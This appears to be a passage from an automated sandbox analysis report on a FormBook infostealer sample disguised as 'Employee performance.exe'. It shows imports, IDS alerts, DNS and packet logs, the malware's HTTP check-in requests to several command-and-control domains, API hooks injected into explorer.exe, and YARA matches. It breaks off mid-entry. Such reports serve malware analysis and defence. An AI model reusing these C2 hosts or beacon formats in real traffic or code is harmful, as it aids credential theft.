SHELL32.dll	DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll	CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-08-05T15:21:45.016591+0200	TCP	2031453	ET MALWARE FormBook CnC Checkin (GET)	49709	80	192.168.2.7	103.224.212.213
2024-08-05T15:24:10.000678+0200	TCP	2031453	ET MALWARE FormBook CnC Checkin (GET)	49712	80	192.168.2.7	91.195.240.19
2024-08-05T15:22:48.422562+0200	TCP	2031453	ET MALWARE FormBook CnC Checkin (GET)	49710	80	192.168.2.7	47.242.64.82
2024-08-05T15:23:07.144896+0200	TCP	2031453	ET MALWARE FormBook CnC Checkin (GET)	49711	80	192.168.2.7	164.90.157.77
2024-08-05T15:21:22.355435+0200	TCP	2031453	ET MALWARE FormBook CnC Checkin (GET)	49707	80	192.168.2.7	23.227.38.74
2024-08-05T15:24:30.944331+0200	TCP	2031453	ET MALWARE FormBook CnC Checkin (GET)	49713	80	192.168.2.7	162.0.209.131

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 5, 2024 15:21:21.891859055 CEST	49707	80	192.168.2.7	23.227.38.74
Aug 5, 2024 15:21:21.896790028 CEST	80	49707	23.227.38.74	192.168.2.7
Aug 5, 2024 15:21:21.896873951 CEST	49707	80	192.168.2.7	23.227.38.74
Aug 5, 2024 15:21:21.896915913 CEST	49707	80	192.168.2.7	23.227.38.74
Aug 5, 2024 15:21:21.901726007 CEST	80	49707	23.227.38.74	192.168.2.7
Aug 5, 2024 15:21:22.353404999 CEST	80	49707	23.227.38.74	192.168.2.7
Aug 5, 2024 15:21:22.353502035 CEST	80	49707	23.227.38.74	192.168.2.7
Aug 5, 2024 15:21:22.353513002 CEST	80	49707	23.227.38.74	192.168.2.7
Aug 5, 2024 15:21:22.353625059 CEST	49707	80	192.168.2.7	23.227.38.74
Aug 5, 2024 15:21:22.353665113 CEST	80	49707	23.227.38.74	192.168.2.7
Aug 5, 2024 15:21:22.353677988 CEST	80	49707	23.227.38.74	192.168.2.7
Aug 5, 2024 15:21:22.353831053 CEST	49707	80	192.168.2.7	23.227.38.74
Aug 5, 2024 15:21:22.353934050 CEST	49707	80	192.168.2.7	23.227.38.74
Aug 5, 2024 15:21:22.355376959 CEST	80	49707	23.227.38.74	192.168.2.7
Aug 5, 2024 15:21:22.355434895 CEST	49707	80	192.168.2.7	23.227.38.74
Aug 5, 2024 15:21:22.359277964 CEST	80	49707	23.227.38.74	192.168.2.7
Aug 5, 2024 15:21:44.513498068 CEST	49709	80	192.168.2.7	103.224.212.213
Aug 5, 2024 15:21:44.519813061 CEST	80	49709	103.224.212.213	192.168.2.7
Aug 5, 2024 15:21:44.519898891 CEST	49709	80	192.168.2.7	103.224.212.213
Aug 5, 2024 15:21:44.519939899 CEST	49709	80	192.168.2.7	103.224.212.213
Aug 5, 2024 15:21:44.524884939 CEST	80	49709	103.224.212.213	192.168.2.7
Aug 5, 2024 15:21:45.010266066 CEST	49709	80	192.168.2.7	103.224.212.213
Aug 5, 2024 15:21:45.016470909 CEST	80	49709	103.224.212.213	192.168.2.7
Aug 5, 2024 15:21:45.016591072 CEST	49709	80	192.168.2.7	103.224.212.213
Aug 5, 2024 15:22:47.824520111 CEST	49710	80	192.168.2.7	47.242.64.82
Aug 5, 2024 15:22:47.829530001 CEST	80	49710	47.242.64.82	192.168.2.7
Aug 5, 2024 15:22:47.829592943 CEST	49710	80	192.168.2.7	47.242.64.82
Aug 5, 2024 15:22:47.829894066 CEST	49710	80	192.168.2.7	47.242.64.82
Aug 5, 2024 15:22:47.835935116 CEST	80	49710	47.242.64.82	192.168.2.7
Aug 5, 2024 15:22:48.338618040 CEST	49710	80	192.168.2.7	47.242.64.82
Aug 5, 2024 15:22:48.387846947 CEST	80	49710	47.242.64.82	192.168.2.7
Aug 5, 2024 15:22:48.422506094 CEST	80	49710	47.242.64.82	192.168.2.7
Aug 5, 2024 15:22:48.422561884 CEST	49710	80	192.168.2.7	47.242.64.82
Aug 5, 2024 15:23:06.641454935 CEST	49711	80	192.168.2.7	164.90.157.77
Aug 5, 2024 15:23:06.646328926 CEST	80	49711	164.90.157.77	192.168.2.7
Aug 5, 2024 15:23:06.646394968 CEST	49711	80	192.168.2.7	164.90.157.77
Aug 5, 2024 15:23:06.646516085 CEST	49711	80	192.168.2.7	164.90.157.77
Aug 5, 2024 15:23:06.651598930 CEST	80	49711	164.90.157.77	192.168.2.7
Aug 5, 2024 15:23:07.139142990 CEST	49711	80	192.168.2.7	164.90.157.77
Aug 5, 2024 15:23:07.144824982 CEST	80	49711	164.90.157.77	192.168.2.7
Aug 5, 2024 15:23:07.144896030 CEST	49711	80	192.168.2.7	164.90.157.77
Aug 5, 2024 15:24:09.492476940 CEST	49712	80	192.168.2.7	91.195.240.19
Aug 5, 2024 15:24:09.497493982 CEST	80	49712	91.195.240.19	192.168.2.7
Aug 5, 2024 15:24:09.497587919 CEST	49712	80	192.168.2.7	91.195.240.19
Aug 5, 2024 15:24:09.510179043 CEST	49712	80	192.168.2.7	91.195.240.19
Aug 5, 2024 15:24:09.515161991 CEST	80	49712	91.195.240.19	192.168.2.7
Aug 5, 2024 15:24:09.995337009 CEST	49712	80	192.168.2.7	91.195.240.19
Aug 5, 2024 15:24:10.000612020 CEST	80	49712	91.195.240.19	192.168.2.7
Aug 5, 2024 15:24:10.000678062 CEST	49712	80	192.168.2.7	91.195.240.19
Aug 5, 2024 15:24:30.413937092 CEST	49713	80	192.168.2.7	162.0.209.131
Aug 5, 2024 15:24:30.420428038 CEST	80	49713	162.0.209.131	192.168.2.7
Aug 5, 2024 15:24:30.420507908 CEST	49713	80	192.168.2.7	162.0.209.131
Aug 5, 2024 15:24:30.420622110 CEST	49713	80	192.168.2.7	162.0.209.131
Aug 5, 2024 15:24:30.429646969 CEST	80	49713	162.0.209.131	192.168.2.7
Aug 5, 2024 15:24:30.920305967 CEST	49713	80	192.168.2.7	162.0.209.131
Aug 5, 2024 15:24:30.938699961 CEST	80	49713	162.0.209.131	192.168.2.7
Aug 5, 2024 15:24:30.944330931 CEST	49713	80	192.168.2.7	162.0.209.131

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 5, 2024 15:21:21.858716965 CEST	63600	53	192.168.2.7	1.1.1.1
Aug 5, 2024 15:21:21.890985966 CEST	53	63600	1.1.1.1	192.168.2.7
Aug 5, 2024 15:21:44.198983908 CEST	60668	53	192.168.2.7	1.1.1.1
Aug 5, 2024 15:21:44.512900114 CEST	53	60668	1.1.1.1	192.168.2.7
Aug 5, 2024 15:22:03.933473110 CEST	56662	53	192.168.2.7	1.1.1.1
Aug 5, 2024 15:22:03.972008944 CEST	53	56662	1.1.1.1	192.168.2.7
Aug 5, 2024 15:22:25.394150019 CEST	56581	53	192.168.2.7	1.1.1.1
Aug 5, 2024 15:22:25.413278103 CEST	53	56581	1.1.1.1	192.168.2.7
Aug 5, 2024 15:22:46.026977062 CEST	52470	53	192.168.2.7	1.1.1.1
Aug 5, 2024 15:22:47.357908964 CEST	53	52470	1.1.1.1	192.168.2.7
Aug 5, 2024 15:22:47.821484089 CEST	52470	53	192.168.2.7	1.1.1.1
Aug 5, 2024 15:22:47.828656912 CEST	53	52470	1.1.1.1	192.168.2.7
Aug 5, 2024 15:23:06.574191093 CEST	63224	53	192.168.2.7	1.1.1.1
Aug 5, 2024 15:23:06.640357971 CEST	53	63224	1.1.1.1	192.168.2.7
Aug 5, 2024 15:23:48.330102921 CEST	58214	53	192.168.2.7	1.1.1.1
Aug 5, 2024 15:23:48.919564009 CEST	53	58214	1.1.1.1	192.168.2.7
Aug 5, 2024 15:24:08.894490957 CEST	54550	53	192.168.2.7	1.1.1.1
Aug 5, 2024 15:24:09.161062956 CEST	53	54550	1.1.1.1	192.168.2.7
Aug 5, 2024 15:24:30.398420095 CEST	54063	53	192.168.2.7	1.1.1.1
Aug 5, 2024 15:24:30.412988901 CEST	53	54063	1.1.1.1	192.168.2.7
Aug 5, 2024 15:24:51.430001974 CEST	64703	53	192.168.2.7	1.1.1.1
Aug 5, 2024 15:24:51.442382097 CEST	53	64703	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 5, 2024 15:21:21.858716965 CEST	192.168.2.7	1.1.1.1	0xed0f	Standard query (0)	www.loki360store.com	A (IP address)	IN (0x0001)	false
Aug 5, 2024 15:21:44.198983908 CEST	192.168.2.7	1.1.1.1	0x470f	Standard query (0)	www.warpateam.com	A (IP address)	IN (0x0001)	false
Aug 5, 2024 15:22:03.933473110 CEST	192.168.2.7	1.1.1.1	0x265	Standard query (0)	www.ladonbet.xyz	A (IP address)	IN (0x0001)	false
Aug 5, 2024 15:22:25.394150019 CEST	192.168.2.7	1.1.1.1	0x33fb	Standard query (0)	www.09gmpvp51.com	A (IP address)	IN (0x0001)	false
Aug 5, 2024 15:22:46.026977062 CEST	192.168.2.7	1.1.1.1	0x2e66	Standard query (0)	www.greate-electronics.com	A (IP address)	IN (0x0001)	false
Aug 5, 2024 15:22:47.821484089 CEST	192.168.2.7	1.1.1.1	0x2e66	Standard query (0)	www.greate-electronics.com	A (IP address)	IN (0x0001)	false
Aug 5, 2024 15:23:06.574191093 CEST	192.168.2.7	1.1.1.1	0x6183	Standard query (0)	www.antoni-tapies.com	A (IP address)	IN (0x0001)	false
Aug 5, 2024 15:23:48.330102921 CEST	192.168.2.7	1.1.1.1	0x223b	Standard query (0)	www.sweatxin.com	A (IP address)	IN (0x0001)	false
Aug 5, 2024 15:24:08.894490957 CEST	192.168.2.7	1.1.1.1	0x66e6	Standard query (0)	www.17eclbet.com	A (IP address)	IN (0x0001)	false
Aug 5, 2024 15:24:30.398420095 CEST	192.168.2.7	1.1.1.1	0x8f3d	Standard query (0)	www.webxwhiz.com	A (IP address)	IN (0x0001)	false
Aug 5, 2024 15:24:51.430001974 CEST	192.168.2.7	1.1.1.1	0xb0f5	Standard query (0)	www.kovacsking.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Aug 5, 2024 15:21:21.890985966 CEST	1.1.1.1	192.168.2.7	0xed0f	No error (0)	www.loki360store.com	shops.myshopify.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 5, 2024 15:21:21.890985966 CEST	1.1.1.1	192.168.2.7	0xed0f	No error (0)	shops.myshopify.com		23.227.38.74	A (IP address)	IN (0x0001)	false
Aug 5, 2024 15:21:44.512900114 CEST	1.1.1.1	192.168.2.7	0x470f	No error (0)	www.warpateam.com		103.224.212.213	A (IP address)	IN (0x0001)	false
Aug 5, 2024 15:22:03.972008944 CEST	1.1.1.1	192.168.2.7	0x265	Server failure (2)	www.ladonbet.xyz	none	none	A (IP address)	IN (0x0001)	false
Aug 5, 2024 15:22:25.413278103 CEST	1.1.1.1	192.168.2.7	0x33fb	Name error (3)	www.09gmpvp51.com	none	none	A (IP address)	IN (0x0001)	false
Aug 5, 2024 15:22:47.357908964 CEST	1.1.1.1	192.168.2.7	0x2e66	No error (0)	www.greate-electronics.com	y1.0pt8q-ic.ty3w.net		CNAME (Canonical name)	IN (0x0001)	false
Aug 5, 2024 15:22:47.357908964 CEST	1.1.1.1	192.168.2.7	0x2e66	No error (0)	y1.0pt8q-ic.ty3w.net		47.242.64.82	A (IP address)	IN (0x0001)	false
Aug 5, 2024 15:22:47.828656912 CEST	1.1.1.1	192.168.2.7	0x2e66	No error (0)	www.greate-electronics.com	y1.0pt8q-ic.ty3w.net		CNAME (Canonical name)	IN (0x0001)	false
Aug 5, 2024 15:22:47.828656912 CEST	1.1.1.1	192.168.2.7	0x2e66	No error (0)	y1.0pt8q-ic.ty3w.net		47.242.64.82	A (IP address)	IN (0x0001)	false
Aug 5, 2024 15:23:06.640357971 CEST	1.1.1.1	192.168.2.7	0x6183	No error (0)	www.antoni-tapies.com	antoni-tapies.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 5, 2024 15:23:06.640357971 CEST	1.1.1.1	192.168.2.7	0x6183	No error (0)	antoni-tapies.com		164.90.157.77	A (IP address)	IN (0x0001)	false
Aug 5, 2024 15:23:48.919564009 CEST	1.1.1.1	192.168.2.7	0x223b	Name error (3)	www.sweatxin.com	none	none	A (IP address)	IN (0x0001)	false
Aug 5, 2024 15:24:09.161062956 CEST	1.1.1.1	192.168.2.7	0x66e6	No error (0)	www.17eclbet.com	parkingpage.namecheap.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 5, 2024 15:24:09.161062956 CEST	1.1.1.1	192.168.2.7	0x66e6	No error (0)	parkingpage.namecheap.com		91.195.240.19	A (IP address)	IN (0x0001)	false
Aug 5, 2024 15:24:30.412988901 CEST	1.1.1.1	192.168.2.7	0x8f3d	No error (0)	www.webxwhiz.com	webxwhiz.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 5, 2024 15:24:30.412988901 CEST	1.1.1.1	192.168.2.7	0x8f3d	No error (0)	webxwhiz.com		162.0.209.131	A (IP address)	IN (0x0001)	false
Aug 5, 2024 15:24:51.442382097 CEST	1.1.1.1	192.168.2.7	0xb0f5	Name error (3)	www.kovacsking.shop	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.loki360store.com

www.warpateam.com

www.greate-electronics.com

www.antoni-tapies.com

www.17eclbet.com

www.webxwhiz.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49707	23.227.38.74	80	4056	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 5, 2024 15:21:21.896915913 CEST	172	OUT	GET /lm31/?vN=I0D4IvR&IR-4WR=3v9Mk5D4UG1ohOatnU60InV+BzHoz0n3lpHv5U7ut2amd93313AWpc+Mp9wa3RzchSXkA2ty2w== HTTP/1.1 Host: www.loki360store.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 5, 2024 15:21:22.353404999 CEST	1236	IN	HTTP/1.1 403 Forbidden Date: Mon, 05 Aug 2024 13:21:22 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4514 Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: max-age=15 Expires: Mon, 05 Aug 2024 13:21:37 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CkPLM%2BlWm21KCRTg6sIdxEcq%2F0L%2FYZCIpwZOq%2Fhi839H7mP7MgndG8YtdpJUhPSWNIbHak7Sl%2F%2FikqAFQp9txf8WxxGZZmv%2F0PJeS9xwoF48TuXplxsN9NpNVQY0F3w0VRzWZBcf"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} Server-Timing: cfRequestDuration;dur=9.999752 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Permitted-Cross-Domain-Policies: none X-Download-Options: noopen Server: cloudflare CF-RAY: 8ae717025e1743c8-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e [TRUNCATED] Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Attention Required! \| Cloudflare</tit
Aug 5, 2024 15:21:22.353502035 CEST	1236	IN	Data Raw: 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 Data Ascii: le><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=
Aug 5, 2024 15:21:22.353513002 CEST	1236	IN	Data Raw: 65 73 73 22 3e 59 6f 75 20 61 72 65 20 75 6e 61 62 6c 65 20 74 6f 20 61 63 63 65 73 73 3c 2f 73 70 61 6e 3e 20 6d 79 73 68 6f 70 69 66 79 2e 63 6f 6d 3c 2f 68 32 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 68 65 61 64 65 72 20 Data Ascii: ess">You are unable to access</span> myshopify.com</h2> </div>... /.header --> <div class="cf-section cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full">
Aug 5, 2024 15:21:22.353665113 CEST	1236	IN	Data Raw: 65 20 63 61 6d 65 20 75 70 20 61 6e 64 20 74 68 65 20 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 20 66 6f 75 6e 64 20 61 74 20 74 68 65 20 62 6f 74 74 6f 6d 20 6f 66 20 74 68 69 73 20 70 61 67 65 2e 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: e came up and the Cloudflare Ray ID found at the bottom of this page.</p> </div> </div> </div>... /.section --> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm
Aug 5, 2024 15:21:22.353677988 CEST	440	IN	Data Raw: 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c Data Ascii: ist"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}var a=document;document.addEventListener&&a.addEventListener("DOMContentLoad

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49709	103.224.212.213	80	4056	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 5, 2024 15:21:44.519939899 CEST	169	OUT	GET /lm31/?IR-4WR=je5vN1uA9yEmYEN49dayIwTCku09UgHsksm87SEwvw14I11Hwk0s9tmois1WiUPsr2unY/WNgA==&vN=I0D4IvR HTTP/1.1 Host: www.warpateam.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49710	47.242.64.82	80	4056	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 5, 2024 15:22:47.829894066 CEST	178	OUT	GET /lm31/?vN=I0D4IvR&IR-4WR=FoA+CglQbpkHnr+s7aBTRxGJK1Wdi0lwi/HX1clno50Ms2pZyKjp81NiBNziFvW0ERkZpCilTw== HTTP/1.1 Host: www.greate-electronics.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49711	164.90.157.77	80	4056	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 5, 2024 15:23:06.646516085 CEST	173	OUT	GET /lm31/?IR-4WR=QbCUt2+YIZlz+dwxAAtvOjK27in0zgvhNSRWcpAaxjKea8/898cVmCp5yUX+CKoU4c8tg+UM8w==&vN=I0D4IvR HTTP/1.1 Host: www.antoni-tapies.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49712	91.195.240.19	80	4056	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 5, 2024 15:24:09.510179043 CEST	168	OUT	GET /lm31/?vN=I0D4IvR&IR-4WR=FBWSmpNgcXV4Z7KuJkJmdDxUaYIsSjlTtHPGPH3H6ne0varfGF0HjaluKEQFNPCXvpsJxm6uZg== HTTP/1.1 Host: www.17eclbet.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49713	162.0.209.131	80	4056	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 5, 2024 15:24:30.420622110 CEST	168	OUT	GET /lm31/?IR-4WR=ouOH1iLlZSoKQO8ZGquF9b4n2bh5CptaW8ZUOykV+DLPuA7sqI/QypE0IRpCwT+0rd/MZIKfKw==&vN=I0D4IvR HTTP/1.1 Host: www.webxwhiz.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x89 0x9E 0xE3
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x81 0x1E 0xE3
GetMessageW	INLINE	0x48 0x8B 0xB8 0x81 0x1E 0xE3
GetMessageA	INLINE	0x48 0x8B 0xB8 0x89 0x9E 0xE3

Target ID:	0
Start time:	09:20:42
Start date:	05/08/2024
Path:	C:\Users\user\Desktop\Employee performance.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Employee performance.exe"
Imagebase:	0xfd0000
File size:	1'127'424 bytes
MD5 hash:	DCA3F0AD0EAA9ED5EABFAB13B8E5E72C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1261513480.00000000015E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1261513480.00000000015E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1261513480.00000000015E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1261513480.00000000015E0000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1261513480.00000000015E0000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	09:20:43
Start date:	05/08/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Employee performance.exe"
Imagebase:	0x1000000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.1314204133.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1314204133.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1314204133.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.1314204133.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.1314204133.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.1314573089.0000000003290000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1314573089.0000000003290000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1314573089.0000000003290000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.1314573089.0000000003290000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.1314573089.0000000003290000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.1314603915.00000000032C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1314603915.00000000032C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1314603915.00000000032C0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.1314603915.00000000032C0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.1314603915.00000000032C0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	09:20:45
Start date:	05/08/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff70ffd0000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000003.00000002.3741729017.00000000118D2000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	09:20:48
Start date:	05/08/2024
